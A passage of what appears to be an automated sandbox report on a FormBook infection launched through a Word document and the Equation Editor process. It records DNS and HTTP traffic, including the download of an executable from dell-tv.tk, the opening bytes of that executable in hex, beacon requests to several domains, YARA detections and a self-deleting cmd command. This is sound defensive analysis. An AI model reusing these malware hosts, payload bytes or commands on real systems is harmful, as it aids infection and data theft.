                                                            Nov 25, 2021 18:08:39.452769041 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.480346918 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.480376005 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.480406046 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.480436087 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.485872030 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.485944986 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.513463020 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.513494015 CET804916537.0.9.166192.168.2.22
                                                            Nov 25, 2021 18:08:39.513536930 CET4916580192.168.2.2237.0.9.166
                                                            Nov 25, 2021 18:08:39.513566971 CET4916580192.168.2.2237.0.9.166

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 18:08:39.086638927 CET5216753192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:08:39.124274969 CET53521678.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:26.811336994 CET5780553192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:26.902570963 CET53578058.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:31.908102989 CET5903053192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:31.964771032 CET53590308.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:37.156733990 CET5918553192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:37.213021040 CET53591858.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:42.365734100 CET5561653192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:42.420614958 CET53556168.8.8.8192.168.2.22
                                                            Nov 25, 2021 18:10:48.059755087 CET4997253192.168.2.228.8.8.8
                                                            Nov 25, 2021 18:10:48.129635096 CET53499728.8.8.8192.168.2.22

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Nov 25, 2021 18:08:39.086638927 CET192.168.2.228.8.8.80x2206Standard query (0)dell-tv.tkA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:26.811336994 CET192.168.2.228.8.8.80xfc43Standard query (0)www.bandhancustomer.comA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:31.908102989 CET192.168.2.228.8.8.80x9c63Standard query (0)www.texaszephyr.comA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:37.156733990 CET192.168.2.228.8.8.80x30e0Standard query (0)www.publicfigure.skinA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:42.365734100 CET192.168.2.228.8.8.80x9037Standard query (0)www.volunteervabetweenk.comA (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:48.059755087 CET192.168.2.228.8.8.80xce43Standard query (0)www.1oavyx.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Nov 25, 2021 18:08:39.124274969 CET8.8.8.8192.168.2.220x2206No error (0)dell-tv.tk37.0.9.166A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:31.964771032 CET8.8.8.8192.168.2.220x9c63No error (0)www.texaszephyr.comtexaszephyr.comCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 18:10:31.964771032 CET8.8.8.8192.168.2.220x9c63No error (0)texaszephyr.com34.102.136.180A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:37.213021040 CET8.8.8.8192.168.2.220x30e0No error (0)www.publicfigure.skinpublicfigure.skinCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 18:10:37.213021040 CET8.8.8.8192.168.2.220x30e0No error (0)publicfigure.skin34.102.136.180A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:42.420614958 CET8.8.8.8192.168.2.220x9037No error (0)www.volunteervabetweenk.com172.67.184.102A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:42.420614958 CET8.8.8.8192.168.2.220x9037No error (0)www.volunteervabetweenk.com104.21.32.75A (IP address)IN (0x0001)
                                                            Nov 25, 2021 18:10:48.129635096 CET8.8.8.8192.168.2.220xce43Name error (3)www.1oavyx.comnonenoneA (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • dell-tv.tk
                                                            • www.texaszephyr.com
                                                            • www.publicfigure.skin
                                                            • www.volunteervabetweenk.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.224916537.0.9.16680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 18:08:39.172686100 CET0OUTGET /ashlyzx.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: dell-tv.tk
                                                            Connection: Keep-Alive
                                                            Nov 25, 2021 18:08:39.202337980 CET2INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 25 Nov 2021 17:08:39 GMT
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 560128
                                                            Last-Modified: Thu, 25 Nov 2021 01:30:41 GMT
                                                            Connection: keep-alive
                                                            ETag: "619ee741-88c00"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 e5 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 80 08 00 00 0a 00 00 00 00 00 00 16 9f 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 9e 08 00 4f 00 00 00 00 a0 08 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 7f 08 00 00 20 00 00 00 80 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 08 00 00 08 00 00 00 82 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 8a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9e 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b8 21 01 00 03 00 00 00 8c 01 00 06 64 6a 02 00 60 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23 00 00 0a 28 31 00 00 0a 02 7b 03 00 00 04 6f 23 00 00 0a 28 32 00 00 0a 0a 06 72 01 00 00 70 28 33 00 00 0a 28 34 00 00 0a 16 73 35 00 00 0a 0b 02 7b 02 00 00 04 6f 28 00 00 0a 0c 38 89 00 00 00 12 02 28 29 00 00 0a 0d 07 09 6f 77 02 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa0 @ @Op H.textt `.rsrcp@@.reloc@BHH!dj`4s}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#(1{o#(2rp(3(4s5{o(8()ow


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 18:10:31.987536907 CET593OUTGET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1
                                                            Host: www.texaszephyr.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 18:10:32.106173992 CET593INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 17:10:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "618be75c-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 18:10:37.240250111 CET594OUTGET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1
                                                            Host: www.publicfigure.skin
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 18:10:37.357868910 CET594INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 17:10:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "618be75c-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.2249169172.67.184.10280C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 18:10:42.459754944 CET595OUTGET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1
                                                            Host: www.volunteervabetweenk.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 18:10:43.044056892 CET596INHTTP/1.1 404 Not Found
                                                            Date: Thu, 25 Nov 2021 17:10:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            vary: Accept-Encoding
                                                            cache-control: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6b3c7df37c1c4230-AMS
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            Analysis Process: WINWORD.EXE PID: 1516 Parent PID: 596

                                                            General

                                                            Start time:18:08:15
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13f150000
                                                            File size:1423704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Analysis Process: EQNEDT32.EXE PID: 2812 Parent PID: 596

                                                            General

                                                            Start time:18:08:17
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Analysis Process: ashlkyvc7592.exe PID: 1528 Parent PID: 2812

                                                            General

                                                            Start time:18:08:24
                                                            Start date:25/11/2021
                                                            Path:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Imagebase:0x60000
                                                            File size:560128 bytes
                                                            MD5 hash:D236BB1F86CAEC110ABB20FC2360E25B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            Analysis Process: ashlkyvc7592.exe PID: 836 Parent PID: 1528

                                                            General

                                                            Start time:18:08:25
                                                            Start date:25/11/2021
                                                            Path:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Imagebase:0x60000
                                                            File size:560128 bytes
                                                            MD5 hash:D236BB1F86CAEC110ABB20FC2360E25B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            Analysis Process: explorer.exe PID: 1764 Parent PID: 836

                                                            General

                                                            Start time:18:08:28
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            Analysis Process: cmstp.exe PID: 2580 Parent PID: 1764

                                                            General

                                                            Start time:18:08:41
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmstp.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                            Imagebase:0x110000
                                                            File size:84992 bytes
                                                            MD5 hash:00263CA2071DC9A6EE577EB356B0D1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            Analysis Process: cmd.exe PID: 2176 Parent PID: 2580

                                                            General

                                                            Start time:18:08:45
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
                                                            Imagebase:0x4aac0000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >